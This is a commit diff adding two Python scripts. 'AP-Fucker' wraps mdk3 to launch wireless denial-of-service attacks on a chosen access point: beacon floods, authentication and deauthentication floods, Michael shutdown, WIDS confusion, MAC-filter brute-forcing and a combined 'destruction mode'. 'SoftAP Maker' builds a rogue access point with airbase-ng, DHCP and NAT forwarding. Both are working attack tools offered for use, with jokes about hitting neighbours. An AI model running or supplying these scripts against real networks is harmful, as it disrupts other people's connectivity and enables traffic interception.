first code commit with a few scripts

AP-Fucker.py

@@ -0,0 +1,270 @@
+#!/usr/bin/env python
+# -*- coding: Utf-8 -*-
+#
+# WIRELESS ACCESS POINT FUCKER
+# Interactive, Multifunction, Destruction Mode Included
+#
+# Thanks to BackTrack crew, especially ShamanVirtuel and ASPJ
+#
+# USAGE: Launch the script as root using "python AP-Fucker.py", follow instructions, enjoy!
+# Prerequisites: Have mdk3 installed
+#
+
+__app__ = "AP-Fucker"
+__version__ = "0.5"
+__author__ = "MatToufoutu"
+
+### IMPORTS
+from sys import stdout
+from sys import exit as sysexit
+from os import system, remove, path
+from commands import getoutput
+from threading import Thread
+from time import sleep, ctime
+
+### MDK3 THREADED ATTACKS CLASS
+class Mdk3(Thread):
+    def __init__(self, attack, attack_options):
+        Thread.__init__(self)
+        self.attack = attack
+        self.iface = attack_options[0]
+        self.essid = attack_options[1]
+        self.bssid = attack_options[2]
+        self.chan = attack_options[3]
+        self.log = "apfucker.log"
+        self.modes = {"B":self.bflood, "A":self.ados, "D":self.amok,
+                      "M":self.mich, "W":self.wids, "C":self.brutmac}
+    def bflood(self):
+        out = open(self.log,"a")
+        out.write("\n ----- "+ctime()+" : Launching beacon flood against %s on channel %s -----" % (self.essid, self.chan))
+        out.close()
+        print("\n Launching beacon flood against %s on channel %s" % (self.essid, self.chan))
+        sleep(2)
+        system("mdk3 "+self.iface+" b -n "+self.essid+" -g -w -m -c "+self.chan+" >> "+self.log)
+    def ados(self):
+        out = open(self.log,"a")
+        out.write("\n ----- "+ctime()+" : Launching Auth DoS against %s -----" % (self.bssid))
+        out.close()
+        print("\n Launching Auth DoS against %s " % (self.bssid))
+        sleep(2)
+        system("mdk3 "+self.iface+" a -i "+self.bssid+" -m -s 1024 >> "+self.log)
+    def amok(self):
+        out = open(self.log,"a")
+        out.write("\n ----- "+ctime()+" : Launching Deauth Flood 'Amok' Mode on channel %s -----" % (self.chan))
+        out.close()
+        print("\n Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan))
+        sleep(2)
+        system("mdk3 "+self.iface+" d -c "+self.chan+" -s 1024 >> "+self.log)
+    def mich(self):
+        out = open(self.log,"a")
+        out.write("\n ----- "+ctime()+" : Launching Michael 'Shutdown' Exploitation against %s on channel %s -----" % (self.bssid, self.chan))
+        out.close()
+        print("\n Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan))
+        sleep(2)
+        system("mdk3 "+self.iface+" m -t "+self.bssid+" -j -w 1 -n 1024 -s 1024 >> "+self.log)
+    def wids(self):
+        out = open(self.log,"a")
+        out.write("\n ----- "+ctime()+" : Launching WIDS Confusion against %s on channel %s -----" % (self.essid, self.chan))
+        out.close()
+        print("\n Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan))
+        sleep(2)
+        system("mdk3 "+self.iface+" w -e "+self.essid+" -c "+self.chan+" >> "+self.log)
+    def brutmac(self):
+        global runanim
+        runanim = True
+        out = open(self.log, "a")
+        out.write("\n ----- "+ctime()+" : Launching MAC filter Brute-Forcer against %s -----\n" % (self.bssid))
+        print("\n Launching MAC filter Brute-Forcer against %s" % (self.bssid))
+        sleep(2)
+        macfound = getoutput("mdk3 "+self.iface+" f -t "+self.bssid).splitlines()[-2:]
+        runanim = False
+        sleep(1)
+        print; print
+        for line in macfound:
+            print(line)
+            out.write("\n"+line)
+        out.close()
+        print
+        sysexit(0)
+    def run(self):
+        global runanim
+        runanim = True
+        self.modes[self.attack]()
+        runanim = False
+
+### AUXILIARY FUNCTIONS
+## CHECK IF IFACE IS IN MONITOR MODE
+def check_mon(iface):
+    for line in getoutput("iwconfig "+iface).splitlines():
+        if "Mode:Monitor" in line:
+            return True
+    return False
+
+## CHECK IF BSSID IS VALID
+def check_mac(ap):
+    if len(ap) != 17 or ap.count(':') != 5:
+        return False
+    macchar = "0123456789abcdef:"
+    for c in ap.lower():
+        if macchar.find(c) == -1:
+            return False
+    return True
+
+## CHECK IF CHANNEL IS VALID
+def check_chan(iface, chan):
+    if chan.isdigit():
+        channel = int(chan)
+        if not channel in range(1, int(getoutput("iwlist "+iface+" channel | grep channels | awk '{print $2}'"))+1):
+            return False
+    else:
+        return False
+    return True
+
+## CLEAN EXIT
+def clean_exit():
+    print;print
+    print("\nAction aborted by user. Exiting now")
+    for pid in getoutput("ps aux | grep mdk3 | grep -v grep | awk '{print $2}'").splitlines():
+        system("kill -9 "+pid)
+    print("Hope you enjoyed it ;-)")
+    sleep(2)
+    system("clear")
+    sysexit(0)
+
+## DUMMY WAITING MESSAGE (ANIMATED)
+def waiter(mess):
+    try:
+        stdout.write("\r | "+mess)
+        stdout.flush()
+        sleep(0.15)
+        stdout.write("\r / "+mess)
+        stdout.flush()
+        sleep(0.15)
+        stdout.write("\r-- "+mess)
+        stdout.flush()
+        sleep(0.15)
+        stdout.write("\r \\ "+mess)
+        stdout.flush()
+        sleep(0.15)
+        stdout.write("\r | "+mess)
+        stdout.flush()
+        sleep(0.15)
+        stdout.write("\r / "+mess)
+        stdout.flush()
+        sleep(0.15)
+        stdout.write("\r-- "+mess)
+        stdout.flush()
+        sleep(0.15)
+        stdout.write("\r \\ "+mess)
+        stdout.flush()
+        sleep(0.15)
+    except KeyboardInterrupt:
+        clean_exit()
+
+### MAIN APP
+try:
+    import psyco
+    psyco.full()
+except ImportError:
+    pass
+
+attackAvail = ["B", "A", "W", "D", "M", "T", "E", "C"]
+attack_opt = []
+
+if getoutput("whoami") != "root":
+    print("This script must be run as root !")
+    sysexit(0)
+try:
+    system("clear")
+    print("\n\t\t########## ACCESS POINT FUCKER ##########\n")
+    print("""Choose your Mode:
+    \t - (B)eacon flood
+    \t - (A)uth DoS
+    \t - (W)ids confusion
+    \t - (D)isassociation 'AmoK Mode'
+    \t - (M)ichael shutdown exploitation
+    \t - MA(C) Filter Brute-Forcer
+    \t - Des(T)ruction mode (USE WITH CAUTION)\n""")
+
+    ## GET MODE
+    while 1:
+        mode = raw_input("\n>>> ")
+        if mode.upper() not in attackAvail:
+            print("  '%s' is not a valid mode !" % mode)
+        else:
+            break
+
+    ## GET INTERFACE
+    while 1:
+        iface = raw_input("\nMonitor interface to use: ")
+        if check_mon(iface):
+            attack_opt.append(iface)
+            break
+        else:
+            print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface)
+
+    ## GET ESSID
+    if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T":
+        attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"")
+    else:
+        attack_opt.append(None)
+
+    ## GET BSSID
+    if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T" or mode.upper() == "C":
+        while 1:
+            bssid = raw_input("\nTarget BSSID: ")
+            if check_mac(bssid):
+                attack_opt.append(bssid)
+                break
+            else:
+                print("Invalid BSSID, try again or hit Ctrl+C to quit")
+    else:
+        attack_opt.append(None)
+
+    ## GET CHANNEL
+    if mode.upper() != "C":
+        while 1:
+            channel = raw_input("\nTarget channel: ")
+            if check_chan(iface, channel):
+                attack_opt.append(channel)
+                break
+            else:
+                print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit")
+    else:
+        attack_opt.append(None)
+
+    ## LAUNCH SELECTED ATTACK
+    if path.exists("apfucker.log"):
+        remove("apfucker.log")
+    if mode.upper() != "T":
+        system('clear')
+        Mdk3(mode.upper(), attack_opt).start()
+        sleep(1)
+        print; print; print
+        while runanim:
+            waiter("   ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
+    else:
+        system('clear')
+        print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n")
+        print(" You've choosen DESTRUCTION MODE")
+        print(" Using this mode may harm your WiFi card, use it at your own risks.")
+        validate = raw_input(" Do you wish to continue? (y/N): ")
+        if validate.upper() != "Y":
+            print(" Ok, exiting now")
+            sysexit(0)
+        else:
+            out = open("apfucker.log","a")
+            out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3]))
+            out.close()
+            print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3]))
+            print(" Please be kind with your neighbours xD")
+            ##wids not implemented: may raise segfault
+            ##appears to be an internal mdk3 issue when running multiple attacks
+            for atk in ("B", "A", "D", "M"):
+                Mdk3(atk, attack_opt).start()
+            sleep(1)
+            print; print; print
+            while runanim:
+                waiter("   DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
+except KeyboardInterrupt:
+    clean_exit()

Soft-AP.py

@@ -0,0 +1,116 @@
+#!/usr/bin/env python
+# -*- coding: Utf-8 -*-
+
+__app__ = 'SoftAP Maker'
+__verions__ = '0.3'
+__author__ = 'MatToufoutu'
+
+import os
+from sys import exit as sysexit
+from commands import getoutput
+from threading import Thread
+from time import sleep
+
+def airBase(bssid, essid, channel, iface):
+    os.system("modprobe tun 2>&1 1>& /dev/null")
+    os.system("xterm -e airbase-ng -a %s -e '%s' -c %s %s" % (bssid, essid, channel, iface))
+
+#CHECK IF USER IS ROOT
+if getoutput('whoami') != 'root':
+    print("You have to be root!")
+    sysexit()
+
+os.system("clear")
+print("\n\t\t\t[ SoftAP Maker ]")
+
+# GET SETTINGS FOR THE FAKE AP
+IFACE, BSSID, ESSID, CHANNEL = '', '', '', 0
+DHCPDCONF="""
+## This configuration was auto-generated for SoftAP
+ddns-update-style ad-hoc;
+default-lease-time 600;
+max-lease-time 7200;
+subnet 10.0.0.0 netmask 255.255.255.0 {
+    option subnet-mask 255.255.255.0;
+    option broadcast-address 10.0.0.255;
+    option routers 10.0.0.1;
+    option domain-name-servers 208.67.222.222, 208.67.220.220;
+    range 10.0.0.10 10.0.0.20;
+}
+## End of SoftAP auto-generated config
+"""
+
+IFACE = raw_input("\nWireless interface to use\n>>> ")
+while IFACE not in getoutput('iwconfig'):
+    print("Interface %s can't be found, please try again\n" % IFACE)
+    IFACE = raw_input("Wireless interface to use\n>>> ")
+if not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[0] \
+and not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[1]:
+    print("Switching interface to Monitor Mode")
+    os.system('airmon-ng start '+IFACE+' > /dev/null')
+    if not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[0] \
+    and not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[1]:
+        print("Could not switch interface to monitor mode")
+        print("If your interface use VAPs, specify directly your monitor interface")
+        sysexit()
+
+OUT_IFACE = raw_input("\nInternet connection interface\n>>> ")
+while OUT_IFACE not in getoutput('ifconfig'):
+    print("Interface %s can't be found, please try again\n>>> " % OUT_IFACE)
+    OUT_IFACE = raw_input("Internet connection interface\n>>> ")
+
+BSSID = raw_input("\nFake AP's BSSID (leave blank to use card's @mac)\n>>> ")
+while (len(BSSID) != 17) and (BSSID.count(':') != 5):
+    if BSSID == '':
+        BSSID = getoutput('macchanger -s '+IFACE+" | awk '{print $3}'")
+        break
+    print("BSSID %s in not valid. Please try again" % BSSID)
+    BSSID = raw_input("Fake AP's BSSID (leave blank to use card's @mac)\n>>> ")
+
+ESSID = raw_input("\nFake AP's ESSID\n>>> ")
+while ESSID == '':
+    print("You MUST enter an ESSID for your Fake AP")
+    ESSID = raw_input("Fake AP's ESSID\n>>> ")
+
+CHANNEL = raw_input("\nChannel to use\n>>> ")
+while not CHANNEL.isdigit() and not (0 < int(CHANNEL) < 14):
+    print("Channel %s is not valid. It must be 1 to 13. Please try again")
+    CHANNEL = raw_input("Channel to use\n>>> ")
+
+#SETUP FAKE AP
+print("\n\nStarting airbase-ng in a separate window")
+fakeAP = Thread(None, airBase, None, (BSSID, ESSID, CHANNEL, IFACE), {})
+fakeAP.start()
+sleep(3)
+os.system('ifconfig at0 up && \
+           ifconfig at0 10.0.0.1 netmask 255.255.255.0 && \
+           ifconfig at0 mtu 1500 && \
+           route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1')
+configfile = open('dhcpd.conf', 'w')
+configfile.write(DHCPDCONF)
+configfile.close()
+print("\nStarting DHCP server for SoftAP clients")
+os.system('dhcpd -cf dhcpd.conf at0 || dhcpd3 -cf dhcpd.conf at0')
+print("\nSetting up iptables and ip forwarding")
+if os.path.exists(os.getcwd()+'/iptables.rules'):
+    os.remove(os.getcwd()+'/iptables.rules')
+os.system('iptables-save > iptables.rules && \
+           iptables -F && iptables -X && iptables -Z && \
+           iptables -t nat -F && iptables -t nat -X && iptables -t nat -Z && \
+           echo 1 > /proc/sys/net/ipv4/ip_forward && \
+           iptables -t nat --append POSTROUTING --out-interface %s -j MASQUERADE'
+           % OUT_IFACE)
+endAP = raw_input("\nPress <Enter> to stop the SoftAP")
+
+#STOP AP AND RESTORE CONFIGURATIONS
+print("Restoring all configurations")
+dhcp_pid = getoutput("ps aux | grep -v grep | grep 'dhcpd -cf dhcpd.conf' | awk '{print $2}'")
+airbase_pid = getoutput("ps aux | grep -v grep | grep airbase-ng | awk '{print $2}'")
+os.system('kill -9 %s && killall airbase-ng && \
+           iptables -t nat -F && iptables -t nat -X && iptables -t nat -Z && \
+           iptables-restore < iptables.rules && \
+           echo 0 > /proc/sys/net/ipv4/ip_forward' % dhcp_pid)
+os.remove(os.getcwd()+'/dhcpd.conf')
+os.remove(os.getcwd()+'/iptables.rules')
+print("\nThanks for using SoftAP Maker\n")
+sysexit()